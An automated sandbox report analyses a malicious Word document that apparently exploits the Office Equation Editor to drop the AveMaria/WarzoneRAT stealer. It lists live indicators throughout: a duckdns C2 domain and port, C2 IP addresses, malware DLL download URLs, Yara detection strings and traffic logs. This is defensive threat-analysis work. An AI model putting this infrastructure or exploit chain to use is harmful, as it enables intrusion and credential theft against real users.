Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ-BT5004423.doc

Overview

General Information

Sample Name:RFQ-BT5004423.doc
Analysis ID:784063
MD5:b257091625b5b040a5808460693b7f9d
SHA1:dccbd982b068faaf1ed0dbcc6e950c45131b971b
SHA256:1e553bc65d767b00782c9bfafe1407516b454d1c45a741e6603c20ce9418b9ff
Tags:doc
Infos:

Detection

AveMaria, UACMe
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
Detected unpacking (overwrites its own PE header)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Multi AV Scanner detection for domain / URL
Maps a DLL or memory area into another process
Office equation editor drops PE file
Uses dynamic DNS services
Installs a global keyboard hook
Increases the number of concurrent connection per server for Internet Explorer
Contains functionality to hide user accounts
Contains functionality to register a low level keyboard hook
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Contains functionality to steal e-mail passwords
Found evasive API chain checking for user administrative privileges
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Contains functionality to steal Chrome passwords or cookies
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Contains functionality to inject threads in other processes
Contains functionality to detect sleep reduction / modifications
Found decision node followed by non-executed suspicious APIs
Contains functionality to create new users
Antivirus or Machine Learning detection for unpacked file
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Contains functionality to download and execute PE files
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
May check if the current machine is a sandbox (GetTickCount - Sleep)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality to check if a connection to the internet is available
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Detected TCP or UDP traffic on non-standard ports
Office Equation Editor has been started
Contains functionality to download and launch executables
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Potential document exploit detected (performs HTTP gets)

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 1660 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1184 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • word.exe (PID: 304 cmdline: C:\Users\user\AppData\Roaming\word.exe MD5: 80158B31173F6E2BC97D5AD1FA9E365F)
      • efwhixxln.exe (PID: 2672 cmdline: "C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppData\Local\Temp\ozirvdg.dl MD5: 5E067A5FD52C68F0AB1AA8BB9928037D)
        • efwhixxln.exe (PID: 1792 cmdline: C:\Users\user\AppData\Local\Temp\efwhixxln.exe MD5: 5E067A5FD52C68F0AB1AA8BB9928037D)
  • dpgglstunxhpw.exe (PID: 2160 cmdline: "C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exe" "C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppD MD5: 5E067A5FD52C68F0AB1AA8BB9928037D)
  • dpgglstunxhpw.exe (PID: 1980 cmdline: "C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exe" "C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppD MD5: 5E067A5FD52C68F0AB1AA8BB9928037D)
  • EQNEDT32.EXE (PID: 2040 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
{"C2 url": "value747.duckdns.org", "port": 1957}
SourceRuleDescriptionAuthorStrings
RFQ-BT5004423.docSUSP_INDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embedding one of the object mostly observed in exploit (e.g. CVE-2017-11882) documents.ditekSHen
  • 0x6a:$obj2: \objdata
  • 0x237:$obj3: \objupdate
RFQ-BT5004423.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x6a:$obj2: \objdata
  • 0x237:$obj3: \objupdate
SourceRuleDescriptionAuthorStrings
00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmpCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
  • 0x18df0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
  • 0x18df0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x18df0:$c1: Elevation:Administrator!new:
00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
    00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
      00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmpMALWARE_Win_WarzoneRATDetects AveMaria/WarzoneRATditekSHen
      • 0x13b7c:$s1: RDPClip
      • 0x14650:$s2: Grabber
      • 0x13bae:$s5: @\cmd.exe
      • 0x18f10:$s6: /n:%temp%\ellocnak.xml
      • 0x18f40:$s7: Hey I'm Admin
      • 0x1261c:$s8: warzone160
      Click to see the 26 entries
      SourceRuleDescriptionAuthorStrings
      6.2.efwhixxln.exe.310000.3.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
      • 0x13ff0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
      6.2.efwhixxln.exe.310000.3.unpackCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
      • 0x13ff0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
      • 0x13ff0:$c1: Elevation:Administrator!new:
      6.2.efwhixxln.exe.310000.3.unpackJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
        6.2.efwhixxln.exe.310000.3.unpackJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
          6.2.efwhixxln.exe.310000.3.unpackMALWARE_Win_WarzoneRATDetects AveMaria/WarzoneRATditekSHen
          • 0x10b7c:$s1: RDPClip
          • 0x11650:$s2: Grabber
          • 0x10bae:$s5: @\cmd.exe
          • 0x14110:$s6: /n:%temp%\ellocnak.xml
          • 0x14140:$s7: Hey I'm Admin
          • 0x1021c:$s8: warzone160
          Click to see the 57 entries

          Exploits

          barindex
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 144.76.136.153, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1184, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1184, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\gstallabt4.2[1].exe
          Timestamp:192.168.2.22193.42.33.2254917519572852327 01/13/23-19:11:17.153394
          SID:2852327
          Source Port:49175
          Destination Port:1957
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:193.42.33.225192.168.2.221957491752852326 01/13/23-19:13:17.220831
          SID:2852326
          Source Port:1957
          Destination Port:49175
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.22193.42.33.2254917519572852328 01/13/23-19:12:57.200600
          SID:2852328
          Source Port:49175
          Destination Port:1957
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:193.42.33.225192.168.2.221957491752852329 01/13/23-19:12:57.200262
          SID:2852329
          Source Port:1957
          Destination Port:49175
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.22193.42.33.2254917519572036734 01/13/23-19:13:17.468300
          SID:2036734
          Source Port:49175
          Destination Port:1957
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:193.42.33.225192.168.2.221957491752036735 01/13/23-19:11:17.149432
          SID:2036735
          Source Port:1957
          Destination Port:49175
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: http://5.206.225.104/dll/freebl3.dllURL Reputation: Label: malware
          Source: http://5.206.225.104/dll/freebl3.dllURL Reputation: Label: malware
          Source: http://5.206.225.104/dll/nss3.dllURL Reputation: Label: malware
          Source: http://5.206.225.104/dll/softokn3.dllURL Reputation: Label: malware
          Source: value747.duckdns.orgAvira URL Cloud: Label: malware
          Source: RFQ-BT5004423.docReversingLabs: Detection: 28%
          Source: RFQ-BT5004423.docVirustotal: Detection: 23%Perma Link
          Source: Yara matchFile source: 6.2.efwhixxln.exe.310000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.efwhixxln.exe.5f6450.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.efwhixxln.exe.5f4be0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.efwhixxln.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.efwhixxln.exe.5f4be0.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.efwhixxln.exe.310000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.efwhixxln.exe.5f6450.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.efwhixxln.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.923531390.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.923616743.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.923388878.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.923411469.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.923479705.00000000005EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.924110797.0000000000310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: efwhixxln.exe PID: 2672, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: efwhixxln.exe PID: 1792, type: MEMORYSTR
          Source: http://5.206.225.104/dll/mozglue.dllVirustotal: Detection: 8%Perma Link
          Source: http://5.206.225.104/dll/msvcp140.dllVirustotal: Detection: 10%Perma Link
          Source: http://5.206.225.104/dll/vcruntime140.dllVirustotal: Detection: 7%Perma Link
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\gstallabt4.2[1].exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\word.exeJoe Sandbox ML: detected
          Source: 7.2.efwhixxln.exe.400000.0.unpackAvira: Label: TR/Redcap.ghjpt
          Source: 6.2.efwhixxln.exe.324a70.2.raw.unpackMalware Configuration Extractor: AveMaria {"C2 url": "value747.duckdns.org", "port": 1957}
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_00409C70 lstrlenA,CryptStringToBinaryA,lstrcpyA,7_2_00409C70
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_00409150 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,7_2_00409150
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_0040ADBB PathFileExistsW,CopyFileW,CryptUnprotectData,LocalFree,7_2_0040ADBB

          Exploits

          barindex
          Source: Yara matchFile source: 6.2.efwhixxln.exe.310000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.efwhixxln.exe.5f6450.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.efwhixxln.exe.5f4be0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.efwhixxln.exe.5fb358.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.efwhixxln.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.efwhixxln.exe.5fb358.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.efwhixxln.exe.310000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.efwhixxln.exe.324a70.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.efwhixxln.exe.5f6450.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.efwhixxln.exe.418070.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.efwhixxln.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.923388878.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.923411469.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.923433855.00000000005FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.924110797.0000000000310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: efwhixxln.exe PID: 2672, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: efwhixxln.exe PID: 1792, type: MEMORYSTR
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exeJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 144.76.136.153 Port: 80Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 144.76.136.153 Port: 443Jump to behavior
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

          Compliance

          barindex
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeUnpacked PE file: 7.2.efwhixxln.exe.400000.0.unpack
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.22:49174 version: TLS 1.2
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
          Source: Binary string: wntdll.pdb source: efwhixxln.exe, 00000006.00000003.921394977.0000000019DA0000.00000004.00001000.00020000.00000000.sdmp, efwhixxln.exe, 00000006.00000003.922547352.0000000019F00000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\xampp\htdocs\6398b440b292443b9ad8030aed6a4b16\Loader\Release\Loader.pdb source: word.exe, 00000005.00000002.928480025.0000000002781000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmp, efwhixxln.exe, 00000006.00000000.914261260.0000000000409000.00000002.00000001.01000000.00000006.sdmp, efwhixxln.exe, 00000006.00000002.924222719.0000000000409000.00000002.00000001.01000000.00000006.sdmp, efwhixxln.exe, 00000006.00000002.924086637.00000000002E0000.00000004.00001000.00020000.00000000.sdmp, efwhixxln.exe, 00000007.00000000.916811680.0000000000409000.00000002.00000001.01000000.00000006.sdmp, efwhixxln.exe, 00000007.00000002.1181864719.0000000003130000.00000004.00000020.00020000.00000000.sdmp, dpgglstunxhpw.exe, 00000008.00000000.938412889.0000000000409000.00000002.00000001.01000000.00000008.sdmp, dpgglstunxhpw.exe, 00000008.00000002.957143775.0000000000409000.00000002.00000001.01000000.00000008.sdmp, dpgglstunxhpw.exe, 0000000B.00000002.986636336.0000000000409000.00000002.00000001.01000000.00000008.sdmp, dpgglstunxhpw.exe, 0000000B.00000000.966540801.0000000000409000.00000002.00000001.01000000.00000008.sdmp, nsv4184.tmp.5.dr, dpgglstunxhpw.exe.6.dr, efwhixxln.exe.5.dr
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_0040DB53 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,7_2_0040DB53
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405D74
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0040699E FindFirstFileW,FindClose,5_2_0040699E
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0040290B FindFirstFileW,5_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_00408917 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,7_2_00408917
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_0040DA4F FindFirstFileW,FindNextFileW,7_2_0040DA4F
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 144.76.136.153:80
          Source: global trafficTCP traffic: 144.76.136.153:80 -> 192.168.2.22:49173
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 144.76.136.153:80
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 144.76.136.153:80
          Source: global trafficTCP traffic: 144.76.136.153:80 -> 192.168.2.22:49173
          Source: global trafficTCP traffic: 144.76.136.153:80 -> 192.168.2.22:49173
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 144.76.136.153:80
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 144.76.136.153:80
          Source: global trafficTCP traffic: 192.168.2.22:49175 -> 193.42.33.225:1957
          Source: global trafficTCP traffic: 193.42.33.225:1957 -> 192.168.2.22:49175
          Source: global trafficTCP traffic: 192.168.2.22:49175 -> 193.42.33.225:1957
          Source: global trafficTCP traffic: 193.42.33.225:1957 -> 192.168.2.22:49175
          Source: global trafficTCP traffic: 192.168.2.22:49175 -> 193.42.33.225:1957
          Source: global trafficTCP traffic: 193.42.33.225:1957 -> 192.168.2.22:49175
          Source: global trafficTCP traffic: 192.168.2.22:49175 -> 193.42.33.225:1957
          Source: global trafficTCP traffic: 193.42.33.225:1957 -> 192.168.2.22:49175
          Source: global trafficTCP traffic: 193.42.33.225:1957 -> 192.168.2.22:49175
          Source: global trafficTCP traffic: 192.168.2.22:49175 -> 193.42.33.225:1957
          Source: global trafficTCP traffic: 193.42.33.225:1957 -> 192.168.2.22:49175
          Source: global trafficTCP traffic: 193.42.33.225:1957 -> 192.168.2.22:49175
          Source: global trafficTCP traffic: 192.168.2.22:49175 -> 193.42.33.225:1957
          Source: global trafficTCP traffic: 193.42.33.225:1957 -> 192.168.2.22:49175
          Source: global trafficTCP traffic: 193.42.33.225:1957 -> 192.168.2.22:49175
          Source: global trafficTCP traffic: 192.168.2.22:49175 -> 193.42.33.225:1957
          Source: global trafficTCP traffic: 193.42.33.225:1957 -> 192.168.2.22:49175
          Source: global trafficTCP traffic: 193.42.33.225:1957 -> 192.168.2.22:49175
          Source: global trafficTCP traffic: 192.168.2.22:49175 -> 193.42.33.225:1957
          Source: global trafficTCP traffic: 193.42.33.225:1957 -> 192.168.2.22:49175
          Source: global trafficTCP traffic: 193.42.33.225:1957 -> 192.168.2.22:49175
          Source: global trafficTCP traffic: 192.168.2.22:49175 -> 193.42.33.225:1957
          Source: global trafficTCP traffic: 193.42.33.225:1957 -> 192.168.2.22:49175
          Source: global trafficTCP traffic: 193.42.33.225:1957 -> 192.168.2.22:49175
          Source: global trafficTCP traffic: 192.168.2.22:49175 -> 193.42.33.225:1957
          Source: global trafficTCP traffic: 192.168.2.22:49175 -> 193.42.33.225:1957
          Source: global trafficTCP traffic: 193.42.33.225:1957 -> 192.168.2.22:49175
          Source: global trafficDNS query: name: transfer.sh
          Source: global trafficDNS query: name: value747.duckdns.org
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
